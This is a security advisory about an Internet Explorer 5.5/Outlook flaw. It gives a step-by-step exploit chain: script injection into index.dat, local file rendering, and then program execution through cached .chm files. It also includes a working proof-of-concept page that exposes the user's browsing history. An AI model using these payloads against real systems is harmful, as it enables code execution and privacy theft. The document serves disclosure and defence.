COMMAND

    IE

SYSTEMS AFFECTED

    IE 5.5 probably 5.x and Outlook/Outlook Express, have not tested

PROBLEM

    Following is  based on  a Georgi  Guninski security  advisory #29.
    This  is  completely  different   issue  from  Advisory  #28   "IE
    5.x/Outlook allows executing  arbitrary programs using  .chm files
    and temporary internet files  folder" though both use  some common
    stuff.

    There is  a security  vulnerability in  IE 5.5  (probably 5.x  and
    Outlook)  which  allows  executing  arbitratrary  programs   using
    OBJECT  TYPE="text/html"  and  parsing  index.dat by revealing the
    location of  temporary internet  files folder.   This may  lead to
    taking full control over user's computer.

    If  one  can  inject  a  file  on  user's  local disk and know its
    location it is possible to execute arbitrary programs in at  least
    two ways:

        1) window.showHelp("c:\\dir\\hostile.chm")
        2) <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002" CODEBASE="C:\DIR\HOSTILE.EXE">

    So the  question arise  how to  inject a  specified file on user's
    disk.  A good  way is to use  the Temporary Internet Files  Folder
    which contain cached documents and files.  The problem with it  is
    there are several  subfolders with random  names.  But  there is a
    special  file  "index.dat"  which  is  something like a catalog or
    registry  which  contains  all  visited  URLs  and  which  is more
    important the names of the random folders in its beginning.  It is
    locatated  in  C:/WINDOWS/Temporary  Internet   Files/Content.IE5/
    under  Win9x  and  in  C:/Documents  and Settings/USERNAME/Local \
    Settings/Temporary Internet  Files/Content.IE5/ under  Win2K -  so
    under Win2K  the username  of the  current user  must be  known or
    guessed which makes things more difficult.

    It is possible to inject JavaScript in it by just doing:

        window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")

    because this URL shall be written in it.

    So if it can  be parsed by IE  and the JavaScript be  executed the
    names of the  random folders will  be known.   But Microsoft tries
    to prevent parsing non-HTML files and they have issued a  security
    bulletin in August:

        http://www.microsoft.com/technet/security/bulletin/MS00-055.asp

    But  it  is  possible  to  parse  (render)  non-HTML  files in the
    following way:

        <OBJECT TYPE="text/html" DATA="file://c:/file.dat"></OBJECT>

    So the exploit scenario is:
    1) inject JavaScript in index.dat by

        window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")

       The JavaScript is executed in  index.dat and has access to  its
       content, which allow to find the random directory names
    2) parse/render index.dat by:

        <OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>

    3) After the Temporary internet Files Folders are known inject for
       example chm files by:

        <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>

    4) Do

        window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");

    The presense  of the  random temporary  internet files  folders in
    index.dat is  very dangerous  - it  means that  every Cross  Frame
    Security  vulnerability  or  vulnerability  that reads local files
    may lead to executing arbitrary  programs.  This means that  a lot
    of previous  vulnerabilities are  much more  serious that  we have
    realized when they were discovered.

    The code is:

    --------parsedat.html------------------------------------------------
    This demo is for  Windows 9x - you  must modify the source  for Win2K.
    You may need to wait a few  minutes if you have slow computer. If  you
    have Pentium  500 or  better or  use Win2K  probably much  less. It is
    expected a window with location "about:blank" to be opened  containing
    index.dat -  the file  where the  random names  of temporary  internet
    files directories are kept (they are random names in the beginning  of
    the window) and the list of  all visited URLs among other stuff.  Once
    the temporary internet  files directories are  know it is  possible to
    execute arbitrary programs thru cached files and showHelp() or  OBJECT
    CODEBASE="...".
    If you don't see a  window with location "about:blank" and  content of
    index.dat close IE and visit the page again.
    <SCRIPT>
    b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
    s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet
    Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
    HEIGHT=200></OBJECT>';
    //s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local
    Settings/Temporary Internet Files/Content.IE5/index.dat"
    TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
    // ^^^ This is for Win2K ------------you must change "Administrator" to
    the actual user name
    setTimeout("document.writeln(s)",5000);
    </SCRIPT>

    Demonstration which opens  index.dat which contains  the Temporary
    Internet  Files  Folders  and  the  list  of  all  visited URLs is
    available:

        http://www.guninski.com/parsedat.html

SOLUTION

    Disable Active Scripting  and move the  location of the  Temporary
    Internet Files Folder to unpredicatable location.